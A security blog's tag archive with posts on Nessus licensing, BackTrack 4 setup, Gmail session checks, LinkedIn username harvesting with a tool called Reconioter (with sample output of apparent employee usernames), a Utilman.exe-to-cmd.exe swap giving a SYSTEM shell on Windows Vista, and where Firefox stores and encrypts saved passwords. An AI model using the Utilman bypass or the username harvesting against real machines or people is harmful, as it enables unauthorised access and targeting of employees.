Tag Archives: how to

A Powerful Vulnerabilty Scanner: Nessus- Part I

I will have some blog posts about Nessus. In this first one, I will mention general issues about it.

What is Nessus?

Nessus is a proprietary comprehensive vulnerability scanning software. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.

You can scan ports and see the things crackers can find to hack so you can take action before they do! There will be some examples later for the vulnerabilities we can find with Nessus.

I always think Nessus is kind of outbox scanner for remote stuff and usually it works in that way. However, it can find default password or weak passwords too.

If you are working on a vulnerability management project, I will recommend you to have another scanner for scanning in the boxes ( i.e vulnerabilities for the software running on the machines. I like  Sunbelt Network Security Inspector for this purpose)

Anyway, let’s check License options for Nessus.

Licenses: What are Licenses? Wasn’t Nessus GPL and free ?

It was free but in 2005 creator of  Nessus sold it to Tenable Network Security. Tenable still maintains  Nessus 2.0 under GPL. They closed the source code for the version 3.0 and higher.

Version 3.0 was the first one which was done by Tenable. It was running almost 5 times faster than v2.  V3 was popular too but having 3 licenses for one product makes users a little confused.

The first type of the licenses is ProfessionalFeed License. With this license, Tenable provides you support of the application. They also provide plugins for you earlier than other licenses.

Pricing for the ProfessionalFeed is based upon the number of Nessus scanners in use within your organization, consultancy or service. The cost is $1,200 per scanner per year.

You can buy ProfessionalFeed from here.

The other type of License is HomeFeed License. A HomeFeed is available for free to individual home users, and cannot be used by organizations or individuals professionally.

The last one is on demand. It allows you to evaluate the ProfessionalFeed by using the HomeFeed subscription commercially for 15 days. You may only perform such an evaluation once.

The on-demand evaluation does not give you access to the customer portal, nor to the features specific to the ProfessionalFeed but should be adequate to test Nessus. You can obtain an activation code here.

Installing and Activating Nessus

Installing Nessus is so straight forward. You can download it from this link. It can run on Linux, Windows and Mac.

For this blog post, I installed it on a windows machine.

After you set it up, don’t forget to activate it. (Remember, even non-professional use of nessus, you are  required to get it activated. (They will send you activation key via e-mail, just grab the key and paste on the dialog window)

How It Works

You need to understand how the software works before scanning the machines across the network.

The most important thing you need to know is Nessus is agentless scanner. What is agentless?

Well, some security software needs to be installed on each machine you scan. However, the way nessus works is different. It uses client/server architecture. There will be a client machine in which you can run the software and make configuration for the scan. There will also be a server, the machine which performs what you tell by using the client machine.

Server and client can be same machine. Don’t forget, you don’t need to pay for each client but you need to pay for each server you install (They are required to have different licenses)

Client/Server Architecture brings some flexibilities. The first one is remote scanning.

You can install the server inside of the network and run client from a remote place say your home. This is so helpful since you don’t need to deal with firewall or IDS issues which can effect the scanning result.

Second advantage is one machine is enough to run a scan for all the network. This is definitely time saving!

I will cover the usage and configuration of Nessus in the next blog post.

BackTrack 4 on Windows Machine

As I mention on the “Some Updates About MySelf” I will update my blog  more frequently. Today, I want to talk about BackTrack4.

Backtrack is a lovely Linux distribution for security professionals. BackTrack4 is now using debian deposotories and that makes it nicer for me.

If you want to run BackTrack on your windows machine, you can use LiveCD or a virtual machine.

Only virtual image I have found was for VMware. VMPlayer is not best solution for a windows machine. Ram and cpu usage goes up and machine can be so slow. However Virtual PC 2007 runs smoothly.

If you get BackTrack VMware image from this link and could not find an image for virtual PC, don’t worry. Install VirtualPC 2007 from here.

Then go to this website and get the VMDK converter. This program will convert VMware images to virtual PC’s virtual hard disk image.

Use ‘letmein’ as your username and ‘bugmenot’ as your password ( Yeah, I don’t like to set up an account either!)

After unzip the directory and start program, you convert BackTrack 4 image to Virtual PC’s hard drive.

That is it!

Ask any question or problem you have.

About GMAIL’s Security

One of my friend recently has a problem with one of his gmail account. The account was compromised. He was sure that he was using strong, unpredictable password. I asked him if he has ever used internet on the public places. His answer was no. He also uses ssh proxy so this cannot be a man middle attack by using arp poisoning.

I am not sure if password database of google got attacked and compromised or it was just an individual problem, but I wanted to check my g-mail account to see what security features gmail has.

My friend understood his account got compromised once he discovered there is a back up e-mail address which  he has no idea with it.

The problem is even tough he can change the password, the current sessions would be open.  This is bad since attackers still can read/send e-mail from his account.

After I checked my gmail account I found followings:

gmail security settings

As you see gmail tell us last account activity by giving the login time.

If you click the details, you will see this screen:

gmail2

There are 5 IPs listed here. Now you can check if you see any unfamiliar IP. I saw one IP in there. I have checked it on whatismyipaddress.com and I was surprised it was from NY. I have iphone so when I was in 3G network, I may use NY IP. However, it was listed IMAP instead of mobile, that makes me a little uncomfortable.

I used my iPhone and see that if it was using same network number in the IP address field. Yes, it did! And, I felt much better:)

There is a button at the upper left to sign out all of the open session except the current one. This will make sure that we are now the only one using this account.

I hope you enjoy with these tips:)

Username harvesting from Social Media

I mentioned some command line utilities you can use to extract user names on internet on my previous blog post.

Today I want to discuss one of these tools: Reconioter

Nowadays, everybody wants to be connected. People want to increase their social networking with facebook, myspace, Linkedin, etc.

Reconioter searches Linkedin’s company directories and find possible user names. Its simple syntax as following:

./usernameGen.py query #number of pages

I have installed it on my BackTrack4 and do some testing. For example, we want to learn some user names for Apple employees, then we can run

./usernameGen.py Apple 2
anefkens
arnoldn
nefkensa
dnewell
dustinn
newelld
abologan
anatolb
bologana
pfrancois
paulf
francoisp
bbondy
brennb
bondyb
zbezdan
zsoltb
bezdanz
tinofaith
tobiasi
inofaitht
erami
eduardor
ramie

As you may realize after finding employees names, the program outputs them in some common user name formats: First name last initial, last name first initial, and first initial, last name.

This tool is great for penetration testers who want to demonstrate some intelligence gathering techniques usage.

Owning Windows Vista with Linux

In this blog post I want to show you a security problem related to Windows Vista.

Vista is criticized for mostly because it uses too much resources.  However do you know that you can “own” the Vista by using Linux.

That is right, you can get access to Vista without any password cracking or anything.

First, boot your machine with Linux.

Go to Windows partition:

cd /mnt/sda1 -a

Now, go to System32 directory:

cd Windows/System32

Backup Utilman.exe file:

mv Utilman.exe Utilman_backup.exe

Copy cmd.exe as Utilman.exe

cp cmd.exe Utilman.exe

Now reboot the machine and remove Linux live CD from CD room.

WindowsVistaHacking

Press CTRL+U to invoke utility manager.

Now, command prompt should be appeared since we have cmd.exe instead of original Utilman.exe

Type whoami to see who you are: System!!!

Type explorer and you can do whatever you want!

capture22

This simple example shows how physical security is important in your company or even at home.

How FF store your passwords? Is it secure?

Introduction

I wanted to know more about how Firefox hold saved password when I was backing up my machine (http://realinfosec.blogspot.com/2009/08/backup-files-on-vista.html)

There are some online tools for this purpose. The most well known one is Xmarks ( previously foxmarks). I don’t want to use it since I was not sure how secure their server.

They provide using your ftp server as an option. However, as you know ftp itself is not a secure protocol. So I started to dig about the way Firefox use to store password.

Password Files

After some research, here is what I found: Firefox stores passwords in two different files:

key3.db: This file stores your key database for your passwords. To transfer saved passwords, you must copy this file along with the following file.

signons.sqlite: This file stores saved passwords. ( Google’s Android OS for cellphones and other small devices includes SQLite.)

Both of these two files are located on the Firefox profile directory.

Linux –> ~/.mozilla/firefox/<profile folder>

Windows Vista/XP/2000 –>      %APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\
Windows 98/Me –>     C:\WINDOWS\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default\

Mac –> ~/Library/Mozilla/Firefox/Profiles/<profile folder>
~/Library/Application Support/Firefox/Profiles/<profile folder>

If you upgrade your Firefox from a previous versions you will see some thing like signons3.txt. In this case firefox stores password in a text file (yes, you read it right!).

This was one of the weakest part of firefox passwords. Before SQLite, firefox kept password in a text file. The file name was signons.txt before Firefox 1..5. signons.txt did not only store passwords but also stored a list of sites which password are never saved.

After FF team found a bug ( I strongly suggest to read about this interesting myspace bug! ) they started to use signons2.txt. With Firefox 3.0, this file is replaced by signons3.txt. And now we have signons.sqlite. That was the evolution of password file.

Now let’s look at how Firefox encrypt saved passwords.

Encryption

There are basically two cases:

1-) Master password is not set: Are you kidding? I hope you will set it right away after read next sentence. If master password is not set, Firefox stores passwords in Base 64 encoding! –

Basically this means, there is real NO ENCRYPTION! Everybody who have access your signons.txt can decode your password easily. PasswordViewer from EdMullen is a nice a decoder for this purpose.

2-) Master password is set: In this case, all saved passwords are encrypted by using the master password and stored on signons.txt and signons.sqlite

You may want to know what encryption algoritm Firefox uses. It is TripleDES (CBC mode). If you want to use more secure encryption method you can use Federal Information Processing Standard (FIPS) 140:

Tools-> Options-> Advanced-> Encryption-> Security Devices-> Software Security Devices->NSS Internal PKCS #11 Module -> Enable FIPS

Then, disable all the non-FIPS TLS cipher suites in about:config

For more info check here.

How to Choose a Strong Master Password

Master key for the encryption algorithm are made from salt which is stored on key3.db and Master Password. This key is used to decrypt saved passwords.

This means, security of saved password is directly related to strength of master password. To choose a strong master password, consider followings:

1-) It should be easy to remember for YOU and hard to guess for OTHERS.

2-) Mozilla (and most other companies such as Microsoft) suggest using at least 8 character with upper case, lower case, number and a special symbol like #, $ % etc,

However, do you think this will fulfill the first part of the first requirement? In other words this alpha numeric + special character password will be easy remember?

If you think you have really good memory then you can set your master password in this way. However, you should remember that master password is not easily recoverable. ( I will write another blog post how to recover, hack, your master password) You can reset it but this will remove all of the saved password from database.

3-) You can have a sentence or phrase which you can remember easily:

Itishardertocrackaprejudicethananatom”

In this way you won’t have hard time to remember the password and it won’t be cracked easily (Almost impossible)

Conclusion

1- ) If you want ff save your password, then use master password to protect them.

2- )If you want to transfer your saved password on firefox, then copy singonsN.txt, signons.sqlite and key3.db to your Firefox profile directory.

Another blog post will be made to explain how to hack/recover Firefox password.

 

Update: I made a blog post about SQLite Database Browser. You can use SQLite db browser to learn more about fields in firefox databases.